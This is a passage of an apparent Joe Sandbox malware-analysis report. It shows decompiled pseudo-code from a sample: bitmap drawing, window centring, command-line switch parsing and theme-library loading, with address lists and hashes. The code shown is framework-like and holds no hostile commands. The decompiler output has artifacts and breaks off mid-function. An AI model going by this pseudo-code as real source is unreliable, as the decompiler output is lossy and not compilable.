						if( *(_t251 - 0x9c) == _t247) {
							goto L3;
						} else {
							E009BA639(_t251 - 0xc8);
							 *(_t251 - 4) = 1;
							E009BAD44(_t209, _t251 - 0xc8, _t237, _t244, CreateCompatibleDC( *(_t251 - 0xb4)));
							_t155 =  *(_t251 - 0x94);
							_t217 =  *(_t251 - 0xa4);
							 *((short*)(_t251 - 0x30)) = 1;
							_t240 = 0x20;
							 *(_t251 - 0x38) = _t155;
							 *(_t251 - 0x34) = _t217;
							 *(_t251 - 0x3c) = 0x28;
							 *((short*)(_t251 - 0x2e)) = _t240;
							 *(_t251 - 0x2c) = _t247;
							 *(_t251 - 0x28) = _t217 * _t155;
							 *(_t251 - 0x24) = _t247;
							 *(_t251 - 0x20) = _t247;
							 *(_t251 - 0x1c) = _t247;
							 *(_t251 - 0x18) = _t247;
							 *(_t251 - 0xd4) = _t247;
							_t158 = CreateDIBSection( *(_t251 - 0xc4), _t251 - 0x3c, _t247, _t251 - 0xd4, _t247, _t247);
							 *(_t251 - 0xa0) = _t158;
							__eflags = _t158 - _t247;
							if(_t158 != _t247) {
								_t159 = SelectObject( *(_t251 - 0xc4), _t158);
								 *(_t251 - 0xd8) = _t159;
								__eflags = _t159 - _t247;
								if(_t159 != _t247) {
									BitBlt( *(_t251 - 0xc4), _t247, _t247,  *(_t251 - 0x94),  *(_t251 - 0xa4),  *(_t251 - 0xb4), _t247, _t247, "singapore");
									_t161 =  *(_t209 + 0xc);
									 *(_t251 - 0x98) = 0x82;
									__eflags = _t161 - _t247;
									if(_t161 > _t247) {
										 *(_t251 - 0x98) = _t161;
									}
									__eflags =  *((intOrPtr*)(_t209 + 8)) - 0x20;
									if( *((intOrPtr*)(_t209 + 8)) != 0x20) {
										E00A52C9F(_t251 - 0xd0, _t251 - 0xc8);
										_t164 =  *((intOrPtr*)(_t209 + 0xa4));
										 *(_t251 - 4) = 2;
										__eflags = _t164 - 0xffffffff;
										if(__eflags == 0) {
											_t164 =  *0xd0fdc4; // 0xf0f0f0
										}
										_push(0xffffffff);
										_push(_t164);
										_push( *(_t251 - 0x98));
										 *(_t251 - 0xe0) =  *(_t251 - 0x94);
										 *(_t251 - 0xe8) = _t247;
										 *(_t251 - 0xe4) = _t247;
										 *(_t251 - 0xdc) =  *(_t251 - 0xa4);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t165 = L00A54073(_t209, _t251 - 0xd0, _t240, _t252 - 0x10, _t251 - 0xe8, __eflags, _t259);
										 *(_t251 - 4) = 1;
										L00A52CB6(_t165, _t251 - 0xd0);
										_t244 = SelectObject;
										goto L28;
									} else {
										_t175 = GetObjectA( *(_t251 - 0xa0), 0x54, _t251 - 0x90);
										__eflags = _t175;
										if(_t175 == 0) {
											L11:
											 *(_t251 - 4) = 0;
											E009BADC5(_t251 - 0xc8);
											goto L3;
										}
										__eflags =  *((short*)(_t251 - 0x7e)) - 0x20;
										if( *((short*)(_t251 - 0x7e)) != 0x20) {
											goto L11;
										}
										_t177 =  *((intOrPtr*)(_t251 - 0x7c));
										__eflags = _t177 - _t247;
										if(_t177 != _t247) {
											 *(_t251 - 0x94) = _t247;
											__eflags =  *(_t251 - 0x88) *  *(_t251 - 0x8c);
											if( *(_t251 - 0x88) *  *(_t251 - 0x8c) <= 0) {
												L28:
												SelectObject( *(_t251 - 0xc4),  *(_t251 - 0xd8));
												SelectObject( *(_t251 - 0xb4),  *(_t251 - 0x9c));
												DeleteObject( *(_t209 + 0x88));
												 *(_t209 + 0x88) =  *(_t251 - 0xa0);
												_t247 = 1;
												goto L20;
											}
											asm("fild dword [ebp-0x98]");
											_t250 = _t177 + 1;
											 *(_t251 - 0xa8) = _t259 *  *0xae8828;
											do {
												_t186 = L00A531D3((( *(_t250 - 1) & 0x000000ff) << 0x00000008 |  *_t250 & 0x000000ff) << 0x00000008 | _t250[1] & 0x000000ff, _t251 - 0xf0, _t251 - 0xe0, _t251 - 0xd0);
												_t252 = _t252 - 0x30;
												 *(_t252 + 0x28) =  *(_t251 - 0xa8);
												 *(_t252 + 0x20) =  *(_t251 - 0xa8);
												_t263 =  *(_t251 - 0xa8);
												 *(_t252 + 0x18) = _t263;
												asm("fldz");
												 *(_t252 + 0x10) = _t263;
												 *((long long*)(_t252 + 8)) =  *((long long*)(_t251 - 0xd0));
												 *_t252 =  *((long long*)(_t251 - 0xf0));
												_push(L00A52FA7(_t186));
												_t188 = E00A52D86(_t250[1] & 0x000000ff);
												 *(_t251 - 0x98) = _t188;
												asm("cdq");
												_t250[1] = (_t188 & 0x000000ff) * (_t250[2] & 0x000000ff) / 0xff;
												asm("cdq");
												 *_t250 = ( *(_t251 - 0x98) >> 0x00000008 & 0x000000ff) * (_t250[2] & 0x000000ff) / 0xff;
												_t200 = ( *(_t251 - 0x98) >> 0x00000010 & 0x000000ff) * (_t250[2] & 0x000000ff);
												asm("cdq");
												 *(_t251 - 0x94) =  *(_t251 - 0x94) + 1;
												_t250 =  &(_t250[4]);
												 *((char*)(_t250 - 5)) = _t200 / 0xff;
												__eflags =  *(_t251 - 0x94) -  *(_t251 - 0x88) *  *(_t251 - 0x8c);
											} while ( *(_t251 - 0x94) <  *(_t251 - 0x88) *  *(_t251 - 0x8c));
											goto L28;
										}
										L20:
										 *(_t251 - 4) = 0;
										E009BADC5(_t251 - 0xc8);
										 *(_t251 - 4) =  *(_t251 - 4) | 0xffffffff;
										E009BADC5(_t251 - 0xb8);
										goto L4;
									}
								}
								SelectObject( *(_t251 - 0xb4),  *(_t251 - 0x9c));
								DeleteObject( *(_t251 - 0xa0));
								goto L11;
							}
							SelectObject( *(_t251 - 0xb4),  *(_t251 - 0x9c));
							goto L11;
						}
					}
					L3:
					 *(_t251 - 4) =  *(_t251 - 4) | 0xffffffff;
					E009BADC5(_t251 - 0xb8);
					goto L4;
				}
			}
























      0x00a37ea2
      0x00a37ea2
      0x00a37ea2
      0x00a37ea2
      0x00a37eac
      0x00a37eb1
      0x00a37eb9
      0x00a37ebb
      0x00a37ebe
      0x00a37ec7
      0x00a37f1d
      0x00a37f22
      0x00a37ed2
      0x00a37ed8
      0x00a37ede
      0x00a37eee
      0x00a37f0a
      0x00a37f2b
      0x00a37f31
      0x00a37f3d
      0x00a37f43
      0x00a37f49
      0x00a37f4b
      0x00a37f5e
      0x00a37f4d
      0x00a37f56
      0x00a37f56
      0x00a37f64
      0x00a37f6a
      0x00000000
      0x00a37f6c
      0x00a37f72
      0x00a37f7d
      0x00a37f8e
      0x00a37f93
      0x00a37f99
      0x00a37fa4
      0x00a37fa8
      0x00a37fab
      0x00a37fae
      0x00a37fc6
      0x00a37fcd
      0x00a37fd1
      0x00a37fd4
      0x00a37fd7
      0x00a37fda
      0x00a37fdd
      0x00a37fe0
      0x00a37fe3
      0x00a37fe9
      0x00a37fef
      0x00a37ff5
      0x00a37ff7
      0x00a38022
      0x00a38024
      0x00a3802a
      0x00a3802c
      0x00a3806b
      0x00a38071
      0x00a38074
      0x00a3807e
      0x00a38080
      0x00a38082
      0x00a38082
      0x00a38088
      0x00a3808c
      0x00a38215
      0x00a3821a
      0x00a38220
      0x00a38224
      0x00a38227
      0x00a38229
      0x00a38229
      0x00a38234
      0x00a38236
      0x00a38237
      0x00a3823d
      0x00a38249
      0x00a3824f
      0x00a38255
      0x00a38266
      0x00a38267
      0x00a38268
      0x00a3826f
      0x00a38270
      0x00a3827b
      0x00a3827f
      0x00a38284
      0x00000000
      0x00a38092
      0x00a380a1
      0x00a380a7
      0x00a380a9
      0x00a38007
      0x00a3800d
      0x00a38011
      0x00000000
      0x00a38011
      0x00a380af
      0x00a380b4
      0x00000000
      0x00000000
      0x00a380ba
      0x00a380bd
      0x00a380bf
      0x00a380f3
      0x00a380f9
      0x00a380fb
      0x00a3828a
      0x00a38296
      0x00a382a4
      0x00a382ac
      0x00a382ba
      0x00a382c0
      0x00000000
      0x00a382c0
      0x00a38101
      0x00a38107
      0x00a38110
      0x00a38116
      0x00a38141
      0x00a38146
      0x00a3814f
      0x00a38159
      0x00a3815d
      0x00a38163
      0x00a38167
      0x00a38169
      0x00a38173
      0x00a3817d
      0x00a38185
      0x00a38186
      0x00a3818f
      0x00a3819b
      0x00a381a7
      0x00a381b9
      0x00a381c5
      0x00a381d3
      0x00a381d6
      0x00a381de
      0x00a381e4
      0x00a381e7
      0x00a381f7
      0x00a381f7
      0x00000000
      0x00a38203
      0x00a380c1
      0x00a380c7
      0x00a380cb
      0x00a380d0
      0x00a380da
      0x00000000
      0x00a380df
      0x00a3808c
      0x00a3803a
      0x00a38042
      0x00000000
      0x00a38042
      0x00a38005
      0x00000000
      0x00a38005
      0x00a37f6a
      0x00a37f0c
      0x00a37f0c
      0x00a37f16
      0x00000000
      0x00a37f1b

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 00A37EAC
      • CreateCompatibleDC.GDI32(00000000), ref: 00A37EE1
      • GetObjectA.GDI32(?,00000018,?), ref: 00A37F02
      • SelectObject.GDI32(?,?), ref: 00A37F54
      • CreateCompatibleDC.GDI32(?), ref: 00A37F81
      • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00A37FE9
      • SelectObject.GDI32(?,?), ref: 00A38005
      • SelectObject.GDI32(?,00000000), ref: 00A38022
      • SelectObject.GDI32(?,?), ref: 00A3803A
      • DeleteObject.GDI32(?), ref: 00A38042
      • BitBlt.GDI32(?,00000000,00000000,?,000000FF,?,00000000,00000000,singapore), ref: 00A3806B
      • GetObjectA.GDI32(?,00000054,?), ref: 00A380A1
      • SelectObject.GDI32(?,?), ref: 00A38296
      • SelectObject.GDI32(?,?), ref: 00A382A4
      • DeleteObject.GDI32(?), ref: 00A382AC
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Object$Select$Create$CompatibleDelete$H_prolog3_Section
      • String ID: $($singapore
      • API String ID: 339215182-3104936141
      • Opcode ID: ccb6324e5aba75378f1c138e9057d3953c971ab2409627af4622274678cc9682
      • Instruction ID: 8eb05263f6517e3a557d7cd90a0684060a5bd11edef49afe2920eb28b7ae4d48
      • Opcode Fuzzy Hash: ccb6324e5aba75378f1c138e9057d3953c971ab2409627af4622274678cc9682
      • Instruction Fuzzy Hash: B6C13870901228DBDB24DF64CD45BEDBBB5BF49310F1085EAF58DA6292DB344A88CF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AC2D5 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 191windowCOMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E009AC2D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagRECT _v76;
				char _v96;
				signed int _v100;
				intOrPtr _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t70;
				signed int _t72;
				struct tagMONITORINFO* _t73;
				struct HMONITOR__* _t103;
				void* _t108;
				struct HMONITOR__* _t109;
				signed int _t117;
				struct tagMONITORINFO* _t118;
				intOrPtr _t119;
				struct tagMONITORINFO* _t120;
				long _t121;
				long _t126;
				void* _t130;
				intOrPtr _t131;
				struct HWND__* _t132;
				void* _t134;
				struct tagMONITORINFO* _t136;
				struct tagMONITORINFO* _t140;
				signed int _t144;

				_t130 = __edx;
				_t70 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t70 ^ _t144;
				_t119 = _a4;
				_t131 = __ecx;
				_v104 = __ecx;
				_t72 = E009B0A7A(__ecx);
				_t136 = 0;
				_v100 = _t72;
				if(_t119 == 0) {
					if((_t72 & 0x40000000) == 0) {
						_t73 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t73 = GetParent( *(__ecx + 0x20));
					}
					_t120 = _t73;
					if(_t120 != _t136) {
						_t118 = SendMessageA(_t120, 0x36b, _t136, _t136);
						if(_t118 != _t136) {
							_t120 = _t118;
						}
					}
				} else {
					_t5 = _t119 + 0x20; // 0x9ab424
					_t120 =  *_t5;
				}
				_v56.left = _t136;
				_v56.top = _t136;
				_v56.right = _t136;
				_v56.bottom = _t136;
				GetWindowRect( *(_t131 + 0x20),  &_v56);
				_v24.left = _t136;
				_v24.top = _t136;
				_v24.right = _t136;
				_v24.bottom = _t136;
				_v40.left = _t136;
				_v40.top = _t136;
				_v40.right = _t136;
				_v40.bottom = _t136;
				if((_v100 & 0x40000000) != 0) {
					_t132 = GetParent( *(_t131 + 0x20));
					GetClientRect(_t132,  &_v24);
					GetClientRect(_t120,  &_v40);
					MapWindowPoints(_t120, _t132,  &_v40, 2);
				} else {
					if(_t120 != _t136) {
						_t117 = GetWindowLongA(_t120, 0xfffffff0);
						if((_t117 & 0x10000000) == 0 || (_t117 & 0x20000000) != 0) {
							_t120 = 0;
						}
					}
					_v96 = 0x28;
					if(_t120 != _t136) {
						GetWindowRect(_t120,  &_v40);
						_t103 =  &_v96;
						__imp__MonitorFromWindow(2, _t103);
						GetMonitorInfoA(_t103, _t120);
						CopyRect( &_v24,  &_v76);
					} else {
						_t108 = E009A6B56();
						if(_t108 != _t136) {
							_t136 =  *(_t108 + 0x20);
						}
						_t109 =  &_v96;
						__imp__MonitorFromWindow(1, _t109);
						GetMonitorInfoA(_t109, _t136);
						CopyRect( &_v40,  &_v76);
						CopyRect( &_v24,  &_v76);
					}
				}
				_t121 = _v56.left;
				asm("cdq");
				_t134 = _v56.right - _t121;
				asm("cdq");
				_t126 = (_v40.right + _v40.left - _t130 >> 1) - (_t134 - _t130 >> 1);
				_t135 = _t134 + _t126;
				_v100 = _v56.bottom - _v56.top;
				asm("cdq");
				asm("cdq");
				_t140 = (_v40.top + _v40.bottom - _t130 >> 1) - (_v100 - _t130 >> 1);
				if(_t134 + _t126 > _v24.right) {
					_t126 = _t121;
				}
				if(_t126 < _v24.left) {
					_t126 = _v24.left;
				}
				if(_t140 + _v100 > _v24.bottom) {
					_t140 = _v56.top - _v56.bottom + _v24.bottom;
				}
				if(_t140 < _v24.top) {
					_t140 = _v24.top;
				}
				return E00AAB46A(E009B0DD3(_v104, 0, _t126, _t140, 0xffffffff, 0xffffffff, 0x15), _t121, _v8 ^ _t144, _t130, _t135, _t140);
			}

































      0x009ac2d5
      0x009ac2dd
      0x009ac2e4
      0x009ac2e8
      0x009ac2ed
      0x009ac2ef
      0x009ac2f2
      0x009ac2f7
      0x009ac2f9
      0x009ac2fe
      0x009ac30a
      0x009ac31c
      0x009ac30c
      0x009ac30f
      0x009ac30f
      0x009ac322
      0x009ac326
      0x009ac330
      0x009ac338
      0x009ac33a
      0x009ac33a
      0x009ac338
      0x009ac300
      0x009ac300
      0x009ac300
      0x009ac300
      0x009ac343
      0x009ac346
      0x009ac349
      0x009ac34c
      0x009ac34f
      0x009ac35c
      0x009ac35f
      0x009ac362
      0x009ac365
      0x009ac368
      0x009ac36b
      0x009ac36e
      0x009ac371
      0x009ac374
      0x009ac41c
      0x009ac423
      0x009ac42a
      0x009ac434
      0x009ac37a
      0x009ac37c
      0x009ac381
      0x009ac38c
      0x009ac395
      0x009ac395
      0x009ac38c
      0x009ac397
      0x009ac3a0
      0x009ac3e3
      0x009ac3e9
      0x009ac3f0
      0x009ac3f7
      0x009ac405
      0x009ac3a2
      0x009ac3a2
      0x009ac3a9
      0x009ac3ab
      0x009ac3ab
      0x009ac3ae
      0x009ac3b5
      0x009ac3bc
      0x009ac3d0
      0x009ac3da
      0x009ac3da
      0x009ac3a0
      0x009ac443
      0x009ac446
      0x009ac44b
      0x009ac44f
      0x009ac456
      0x009ac45e
      0x009ac460
      0x009ac469
      0x009ac471
      0x009ac478
      0x009ac47d
      0x009ac485
      0x009ac485
      0x009ac48a
      0x009ac48c
      0x009ac48c
      0x009ac497
      0x009ac49f
      0x009ac49f
      0x009ac4a5
      0x009ac4a7
      0x009ac4a7
      0x009ac4ca

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
      • String ID: (
      • API String ID: 783970248-3887548279
      • Opcode ID: 2470796f728b8c161719aebdd4d0abb80b806f4b2b7838b1545f4b9f394242ae
      • Instruction ID: d527d600a58b3a1dc94c771957deada2eee2ba6dfccca1178e4db6da21683f62
      • Opcode Fuzzy Hash: 2470796f728b8c161719aebdd4d0abb80b806f4b2b7838b1545f4b9f394242ae
      • Instruction Fuzzy Hash: 5A6118B1901229ABCF00DFE8DD88AEEBBB9FF49710F154516E506F7255CB70A901CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B269A Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 157stringCOMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E009B269A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t30;
				int _t33;
				int _t34;
				int _t35;
				CHAR* _t37;
				void* _t39;
				CHAR* _t43;
				void* _t60;
				void* _t62;
				void* _t64;
				void* _t72;
				void* _t76;
				void* _t77;

				_t72 = __edx;
				_push(4);
				E00AAD232(0xacc860, __ebx, __edi, __esi);
				_t76 = __ecx;
				_t43 =  *(_t77 + 8);
				if(lstrcmpA(_t43, "pt") != 0) {
					_t30 = lstrcmpA(_t43, "p");
					__eflags = _t30;
					if(_t30 != 0) {
						_t30 = E009AB7F1(_t43, "Register");
						__eflags = _t30;
						if(_t30 == 0) {
							L28:
							 *((intOrPtr*)(_t76 + 0x14)) = 6;
						} else {
							_t30 = E009AB7F1(_t43, "Regserver");
							__eflags = _t30;
							if(_t30 == 0) {
								goto L28;
							} else {
								_t30 = E009AB7F1(_t43, "RegisterPerUser");
								__eflags = _t30;
								if(_t30 == 0) {
									L27:
									 *((intOrPtr*)(_t76 + 0x10)) = 1;
									goto L28;
								} else {
									_t30 = E009AB7F1(_t43, "RegserverPerUser");
									__eflags = _t30;
									if(_t30 == 0) {
										goto L27;
									} else {
										_t30 = E009AB7F1(_t43, "Unregister");
										__eflags = _t30;
										if(_t30 == 0) {
											L26:
											 *((intOrPtr*)(_t76 + 0x14)) = 7;
										} else {
											_t30 = E009AB7F1(_t43, "Unregserver");
											__eflags = _t30;
											if(_t30 == 0) {
												goto L26;
											} else {
												_t30 = E009AB7F1(_t43, "UnregisterPerUser");
												__eflags = _t30;
												if(_t30 == 0) {
													L25:
													 *((intOrPtr*)(_t76 + 0x14)) = 7;
													 *((intOrPtr*)(_t76 + 0x10)) = 1;
												} else {
													_t30 = E009AB7F1(_t43, "UnregserverPerUser");
													_pop(_t60);
													__eflags = _t30;
													if(_t30 == 0) {
														goto L25;
													} else {
														__eflags = E00AAF5F8(_t43, "RestartByRestartManager", 0x17);
														if(__eflags != 0) {
															_t33 = lstrcmpA(_t43, "ddenoshow");
															__eflags = _t33;
															if(_t33 != 0) {
																_t34 = lstrcmpA(_t43, "dde");
																__eflags = _t34;
																if(_t34 != 0) {
																	_t35 = E009AB7F1(_t43, "Embedding");
																	_pop(_t62);
																	__eflags = _t35;
																	if(_t35 != 0) {
																		_t30 = E009AB7F1(_t43, "Automation");
																		_pop(_t64);
																		__eflags = _t30;
																		if(_t30 == 0) {
																			_t30 = E009BE782(_t64, _t30);
																			 *((intOrPtr*)(_t76 + 0xc)) = 1;
																			goto L22;
																		}
																	} else {
																		_t30 = E009BE782(_t62, _t35);
																		 *((intOrPtr*)(_t76 + 8)) = 1;
																		L22:
																		 *(_t76 + 4) =  *(_t76 + 4) & 0x00000000;
																	}
																} else {
																	_t30 = E009BE782(_t60, _t34);
																	 *((intOrPtr*)(_t76 + 0x14)) = 4;
																}
															} else {
																_t30 = E009BE782(_t60, _t33);
																 *((intOrPtr*)(_t76 + 0x14)) = 5;
															}
														} else {
															_push(_t43);
															E009AFB60(_t43, _t77 + 8, _t72, lstrcmpA, _t76, __eflags);
															_t37 =  *(_t77 + 8);
															 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
															__eflags =  *((intOrPtr*)(_t37 - 0xc)) - 0x3c;
															if( *((intOrPtr*)(_t37 - 0xc)) == 0x3c) {
																 *((intOrPtr*)(_t76 + 0x14)) = 8;
																_t39 = E009B22E5(_t77 + 8, _t72, _t77 - 0x10, 0x24);
																 *(_t77 - 4) = 1;
																E009B2357(_t43, _t76 + 0x28, _t39);
																__eflags =  *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0;
																E009A5510( *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0, _t72);
															}
															_t30 = E009A5510( &(( *(_t77 + 8))[0xfffffffffffffff0]), _t72);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						 *((intOrPtr*)(_t76 + 0x14)) = 2;
					}
				} else {
					 *((intOrPtr*)(_t76 + 0x14)) = 3;
				}
				return E00AAD30A(_t30);
			}
















      0x009b269a
      0x009b269a
      0x009b26a1
      0x009b26a6
      0x009b26a8
      0x009b26bb
      0x009b26cf
      0x009b26d1
      0x009b26d3
      0x009b26e7
      0x009b26ee
      0x009b26f0
      0x009b288d
      0x009b288d
      0x009b26f6
      0x009b26fc
      0x009b2703
      0x009b2705
      0x00000000
      0x009b270b
      0x009b2711
      0x009b2718
      0x009b271a
      0x009b2886
      0x009b2886
      0x00000000
      0x009b2720
      0x009b2726
      0x009b272d
      0x009b272f
      0x00000000
      0x009b2735
      0x009b273b
      0x009b2742
      0x009b2744
      0x009b287d
      0x009b287d
      0x009b274a
      0x009b2750
      0x009b2757
      0x009b2759
      0x00000000
      0x009b275f
      0x009b2765
      0x009b276c
      0x009b276e
      0x009b286d
      0x009b286d
      0x009b2874
      0x009b2774
      0x009b277a
      0x009b2780
      0x009b2781
      0x009b2783
      0x00000000
      0x009b2789
      0x009b2799
      0x009b279b
      0x009b27f6
      0x009b27f8
      0x009b27fa
      0x009b2814
      0x009b2816
      0x009b2818
      0x009b282f
      0x009b2835
      0x009b2836
      0x009b2838
      0x009b2853
      0x009b2859
      0x009b285a
      0x009b285c
      0x009b285f
      0x009b2864
      0x00000000
      0x009b2864
      0x009b283a
      0x009b283b
      0x009b2840
      0x009b2847
      0x009b2847
      0x009b2847
      0x009b281a
      0x009b281b
      0x009b2820
      0x009b2820
      0x009b27fc
      0x009b27fd
      0x009b2802
      0x009b2802
      0x009b279d
      0x009b279d
      0x009b27a1
      0x009b27a6
      0x009b27a9
      0x009b27ad
      0x009b27b1
      0x009b27bc
      0x009b27c3
      0x009b27cc
      0x009b27d0
      0x009b27d8
      0x009b27db
      0x009b27db
      0x009b27e6
      0x009b27e6
      0x009b279b
      0x009b2783
      0x009b276e
      0x009b2759
      0x009b2744
      0x009b272f
      0x009b271a
      0x009b2705
      0x009b26d5
      0x009b26d5
      0x009b26d5
      0x009b26bd
      0x009b26bd
      0x009b26bd
      0x009b2899

      APIs
      • __EH_prolog3.LIBCMT ref: 009B26A1
      • lstrcmpA.KERNEL32(?,00AD9348,00000004), ref: 009B26B7
      • lstrcmpA.KERNEL32(?,00AD9344), ref: 009B26CF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: lstrcmp$H_prolog3
      • String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$RestartByRestartManager$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde$ddenoshow
      • API String ID: 477540313-844245956
      • Opcode ID: 9535eba39c1fb3de22c8dcebfd6d869f86d20d16fa455ac0398cd0c83162315b
      • Instruction ID: af36989302fb2820e0b7d12e7f6360d7adb6ca95c2602eb72bb08e746dcf6495
      • Opcode Fuzzy Hash: 9535eba39c1fb3de22c8dcebfd6d869f86d20d16fa455ac0398cd0c83162315b
      • Instruction Fuzzy Hash: 1141C3B114870276D724AB35DE86FD7329CEF41774F20091EF507A99C2EFB8E54486A4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009EA5AF Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 73libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 96%
      			E009EA5AF(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t40;
				intOrPtr* _t55;

				_t55 = __ecx;
				_push(L"UxTheme.dll");
				 *__ecx = 0xadf3c8;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				 *((intOrPtr*)(__ecx + 0x44)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0;
				_t40 = E009AB76B(__ecx, __ecx, __eflags);
				 *(__ecx + 0x4c) = _t40;
				if(_t40 == 0) {
					 *((intOrPtr*)(__ecx + 0x50)) = 0;
					 *((intOrPtr*)(__ecx + 0x54)) = 0;
					 *((intOrPtr*)(__ecx + 0x58)) = 0;
					 *((intOrPtr*)(__ecx + 0x5c)) = 0;
					 *((intOrPtr*)(__ecx + 0x60)) = 0;
					 *((intOrPtr*)(__ecx + 0x64)) = 0;
					 *((intOrPtr*)(__ecx + 0x68)) = 0;
				} else {
					 *((intOrPtr*)(_t55 + 0x50)) = GetProcAddress(_t40, "OpenThemeData");
					 *((intOrPtr*)(_t55 + 0x54)) = GetProcAddress( *(_t55 + 0x4c), "CloseThemeData");
					 *((intOrPtr*)(_t55 + 0x58)) = GetProcAddress( *(_t55 + 0x4c), "DrawThemeBackground");
					 *((intOrPtr*)(_t55 + 0x5c)) = GetProcAddress( *(_t55 + 0x4c), "GetThemeColor");
